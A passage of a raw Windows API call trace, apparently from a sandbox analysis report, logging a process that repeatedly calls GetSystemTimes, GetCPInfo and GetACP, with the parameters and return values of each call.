| out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.831] GetACP () returned 0x4e4 [0076.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.832] GetACP () returned 0x4e4 [0076.832] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.832] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.832] GetACP () returned 0x4e4 [0076.832] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.832] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.832] GetACP () returned 0x4e4 [0076.832] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.832] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.833] GetACP () returned 0x4e4 [0076.833] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.833] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.833] GetACP () returned 0x4e4 [0076.833] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.833] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.833] GetACP () returned 0x4e4 [0076.833] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.833] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.834] GetACP () returned 0x4e4 [0076.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.834] GetACP () returned 0x4e4 [0076.834] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.834] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.835] GetACP () returned 0x4e4 [0076.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.835] GetACP () returned 0x4e4 [0076.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.835] GetACP () returned 0x4e4 [0076.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.835] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.835] GetACP () returned 0x4e4 [0076.835] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.836] GetACP () returned 0x4e4 [0076.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.836] GetACP () returned 0x4e4 [0076.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.836] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.836] GetACP () returned 0x4e4 [0076.836] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.837] GetACP () returned 0x4e4 [0076.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.837] GetACP () returned 0x4e4 [0076.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.837] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.837] GetACP () returned 0x4e4 [0076.837] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.838] GetACP () returned 0x4e4 [0076.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.838] GetACP () returned 0x4e4 [0076.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.838] GetACP () returned 0x4e4 [0076.838] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.838] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.838] GetACP () returned 0x4e4 [0076.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.839] GetACP () returned 0x4e4 [0076.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.839] GetACP () returned 0x4e4 [0076.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.839] GetACP () returned 0x4e4 [0076.839] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.839] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.840] GetACP () returned 0x4e4 [0076.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.840] GetACP () returned 0x4e4 [0076.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.840] GetACP () returned 0x4e4 [0076.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.840] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.840] GetACP () returned 0x4e4 [0076.840] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.841] GetACP () returned 0x4e4 [0076.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.841] GetACP () returned 0x4e4 [0076.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.841] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.841] GetACP () returned 0x4e4 [0076.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.842] GetACP () returned 0x4e4 [0076.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.842] GetACP () returned 0x4e4 [0076.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.842] GetACP () returned 0x4e4 [0076.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.842] GetACP () returned 0x4e4 [0076.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.843] GetACP () returned 0x4e4 [0076.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.843] GetACP () returned 0x4e4 [0076.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.843] GetACP () returned 0x4e4 [0076.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.843] GetACP () returned 0x4e4 [0076.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.843] GetACP () returned 0x4e4 [0076.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.844] GetACP () returned 0x4e4 [0076.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.844] GetACP () returned 0x4e4 [0076.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.844] GetACP () returned 0x4e4 [0076.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.845] GetACP () returned 0x4e4 [0076.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.845] GetACP () returned 0x4e4 [0076.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.845] GetACP () returned 0x4e4 [0076.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.851] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.851] GetACP () returned 0x4e4 [0076.851] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.851] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.851] GetACP () returned 0x4e4 [0076.851] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.851] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.851] GetACP () returned 0x4e4 [0076.851] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.851] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.851] GetACP () returned 0x4e4 [0076.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.852] GetACP () returned 0x4e4 [0076.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.852] GetACP () returned 0x4e4 [0076.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.852] GetACP () returned 0x4e4 [0076.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.852] GetACP () returned 0x4e4 [0076.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.853] GetACP () returned 0x4e4 [0076.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.853] GetACP () returned 0x4e4 [0076.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.853] GetACP () returned 0x4e4 [0076.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.853] GetACP () returned 0x4e4 [0076.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.853] GetACP () returned 0x4e4 [0076.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.854] GetACP () returned 0x4e4 [0076.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.854] GetACP () returned 0x4e4 [0076.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.854] GetACP () returned 0x4e4 [0076.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.854] GetACP () returned 0x4e4 [0076.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.854] GetACP () returned 0x4e4 [0076.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.855] GetACP () returned 0x4e4 [0076.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.855] GetACP () returned 0x4e4 [0076.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.855] GetACP () returned 0x4e4 [0076.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.855] GetACP () returned 0x4e4 [0076.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.856] GetACP () returned 0x4e4 [0076.856] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.856] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.856] GetACP () returned 0x4e4 [0076.856] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.856] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.856] GetACP () returned 0x4e4 [0076.856] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.856] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.856] GetACP () returned 0x4e4 [0076.856] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.857] GetACP () returned 0x4e4 [0076.857] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.857] GetACP () returned 0x4e4 [0076.857] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: 